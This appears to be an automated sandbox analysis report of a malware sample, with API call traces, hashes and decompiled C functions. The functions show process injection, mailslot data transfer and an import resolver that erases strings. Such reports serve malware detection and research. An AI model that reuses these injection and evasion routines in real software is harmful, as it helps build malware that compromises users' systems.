  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:C007415B17DF758F2ED04850F95EE60E
Total matches:36
Initial Analysis Report:Open
Initial sample Analysis ID:64002
Initial sample SHA 256:212D2CE18964D507A6FE50EE7C33E5EC4FC6B44DEDCC9463D5F6E2581E48E4C3
Initial sample name:crypt_0001_1096a.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
